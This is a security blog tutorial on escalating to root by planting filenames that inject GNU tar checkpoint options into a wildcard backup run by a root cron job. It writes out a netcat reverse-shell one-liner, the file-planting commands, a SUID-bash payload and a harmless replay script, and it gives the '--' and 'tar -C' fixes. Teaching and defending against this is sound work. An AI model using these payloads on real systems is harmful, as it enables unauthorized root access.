Wednesday, 17 February 2021

***Cron Jobs, tar archives and Wildcards***

This post covers a vulnerability that only exists when several configurations combine: a cron job running as root, a backup taken with tar, and a shell wildcard used to select the files being archived.

Cron jobs in Linux are just scheduled tasks. They often lead to privilege escalation because a system administrator sets up a task that runs with super user privileges and then forgets about it; backup jobs are the most common case. For example, if the cron job calls a shell script that is owned by root but writable by other users, we can simply append a payload to the script and it will be executed as root the next time the job fires. In this scenario I will demonstrate a less obvious variant: the script itself is not writable, but it calls tar on a directory using a wildcard, and that wildcard lets us smuggle our own options into the tar command line and execute a malicious payload.

Tar Checkpoints

GNU tar comes with a little-known feature called checkpoints. With --checkpoint[=N], tar performs an action every Nth record written to or read from the archive (a record is 10 KiB by default, so checkpoints count archive records rather than files), and --checkpoint-action=ACTION says what to do at each one. The intended use is progress reporting: a backup that takes a couple of hours might use --checkpoint-action=echo to print a message, or --checkpoint-action=exec=COMMAND to run a script that emails you, at every checkpoint. That last action, exec, is what makes checkpoints interesting to an attacker: whatever command is named there runs with the privileges of the tar process.

The Scenario

You have enumerated the system and found a shell script owned by root (and not writable by you) that backs up a directory with tar, selecting the files with a wildcard. You have checked the backup location and seen that the archive's timestamp updates every 60 seconds, so a cron job runs the script every minute. The directory being backed up is writable by you. This is the setup needed to abuse tar checkpoints and gain a root shell. Two details matter: the script has to change into the directory before running tar, so the wildcard expands to bare filenames rather than absolute paths (a name like /home/sweps/backups/--checkpoint=1 does not start with -- and is simply treated as a file), and tar has to be GNU tar, which is what almost every Linux distribution ships.

Gaining a shell

We need to create three files in the directory being backed up by the cron job, in this case /home/sweps/backups/. The shell expands the wildcard before tar starts, so any filename that begins with -- is handed to tar as an option rather than as a file to archive:

1. The payload. I will be using my standard reverse shell, pointed at a listener on the box itself since we already have a shell there:

echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/sweps/backups/runme.sh

2. The tar checkpoint file, whose name becomes the option --checkpoint=1 (a checkpoint after every record, so it fires even when the directory is tiny): touch /home/sweps/backups/--checkpoint=1

3. The checkpoint action file, whose name becomes --checkpoint-action=exec=sh runme.sh. The escaped space keeps it a single filename, and tar runs the command through /bin/sh in its own working directory, which is why the relative path runme.sh resolves: touch /home/sweps/backups/--checkpoint-action=exec=sh\ runme.sh

Now all we need to do is set up our listener (nc -lvnp 4444) and wait for the cron job to run backup_files.sh. As soon as tar writes its first record it hits our checkpoint, executes sh runme.sh as root, and the shell connects back to us.
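To see the whole chain without a root cron job, here is an added demonstration script (not from the original post) that replays the three-file setup as the current user against a stand-in for backup_files.sh, whose actual contents the post does not show and which are assumed here. The reverse shell is replaced with a harmless marker file. It runs tar three ways: the vulnerable "cd dir && tar -cf out.tar *", the same job with "--" before the wildcard so tar stops parsing options, and a variant that passes absolute paths without changing directory. Only the first executes the planted checkpoint action.

```shell
#!/bin/sh
# Added example, not from the original post. Reproduces the tar wildcard
# injection as an unprivileged user and shows two invocations that are
# immune to it. Requires GNU tar (--checkpoint is a GNU extension).

# GNU getopt stops permuting options after the first non-option argument
# when POSIXLY_CORRECT is set, which would mask the vulnerable case.
unset POSIXLY_CORRECT

# run_backup_job MODE
#   Plants the three files from the post in a scratch "backups" directory,
#   then runs tar the way a cron job might. The payload only drops a marker
#   file. Prints "pwned" if the planted action ran, "clean" if it did not.
#   MODE is one of:
#     VULN      cd into the directory and archive *        (exploitable)
#     DASHDASH  same, but with -- before the wildcard      (not exploitable)
#     ABSPATH   archive /path/to/backups/* from elsewhere  (not exploitable)
run_backup_job() {
    mode="$1"
    work=$(mktemp -d) || return 2
    backups="$work/backups"
    mkdir -p "$backups"
    echo "quarterly figures" > "$backups/notes.txt"   # file the admin meant to back up

    # The three attacker-controlled files. runme.sh uses an absolute path for
    # the marker because tar's working directory differs between modes.
    printf 'touch "%s/marker"\n' "$work" > "$backups/runme.sh"
    touch "$backups/--checkpoint=1"
    touch "$backups/--checkpoint-action=exec=sh runme.sh"

    # Stand-in for the root cron job's backup_files.sh (assumed shape). The
    # shell expands * before tar starts, so in VULN mode tar actually receives:
    #   --checkpoint=1 --checkpoint-action=exec=sh runme.sh notes.txt runme.sh
    case "$mode" in
        VULN)     (cd "$backups" && tar -cf "$work/backup.tar" *) 2>/dev/null ;;
        DASHDASH) (cd "$backups" && tar -cf "$work/backup.tar" -- *) 2>/dev/null ;;
        ABSPATH)  tar -cf "$work/backup.tar" "$backups"/* 2>/dev/null ;;
        *)        rm -rf "$work"; return 2 ;;
    esac

    if [ -e "$work/marker" ]; then result=pwned; else result=clean; fi
    rm -rf "$work"
    echo "$result"
}

# Stand-alone run: print the outcome of each mode.
for m in VULN DASHDASH ABSPATH; do
    printf '%-9s %s\n' "$m" "$(run_backup_job "$m")"
done
```

The DASHDASH and ABSPATH modes are also the fix from the administrator's side: put -- before any wildcard in a privileged script, or avoid the glob entirely with tar -cf out.tar -C /home/sweps/backups . so attacker-controlled filenames never reach tar's option parser.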


A Less Noisy Payload

Since we are already on the system and only want to escalate our privileges, a less noisy alternative (no network connection for anyone to notice) is to have root copy /bin/bash and set the SUID bit on the copy, giving us a local root shell whenever we want one. The copy is owned by root because the root cron job created it. The payload for that would be:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/sweps/backups/runme.sh

Execute it with /tmp/bash -p. The -p flag is required: without it bash notices that its effective UID differs from its real UID and drops the privilege. This also relies on /tmp not being mounted with the nosuid option, which makes the kernel ignore the SUID bit; if it is, have the payload copy bash somewhere else that root can write to.



